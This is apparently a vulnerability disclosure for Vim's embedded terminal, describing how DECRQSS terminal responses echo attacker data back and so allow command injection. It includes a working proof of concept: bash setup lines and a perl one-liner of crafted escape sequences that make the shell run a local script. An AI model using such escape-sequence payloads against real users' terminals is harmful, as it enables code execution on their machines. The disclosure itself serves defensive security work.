Vim's embedded terminal allows injection via DECRQSS response in vim/vim
Jul 18th 2023
DECRQSS is a terminal response that replies with certain information about the terminal. Various terminals have bugs where a piece of data from the request (i.e. data that the terminal receives) is echoed back in the reply. In some cases this is enough to make it so if untrusted data reaches the terminal a command can be run against the user's wishes.
One example of a place I found where such injection could take place is less: https://www.openwall.com/lists/oss-security/2023/02/07/7 which is a common program for people to run in a terminal.
Proof of Concept
Do some setup:
bash HISTFILE=/dev/null history -c EDITOR=vi set -o vi echo 'printf "\e[31myou got owned"' > ./x && chmod +x ./x
perl -le'print "\eP\$q;v\e\\ \eP\$q d\$\e\\ \eP\$q d\$\e\\ \n \eP\$q.A\e\\ \eP\$q/x\e\\ \eP\$qxA \e\\ \eP\$q x\e\\ \eP\$q ZZ\e\\"'
We get something like:
dgl@dev4:~$ ; ./x you got owned
Achieving code execution, if the user uses the embedded terminal in Vim and happens to receive some attacker controlled data.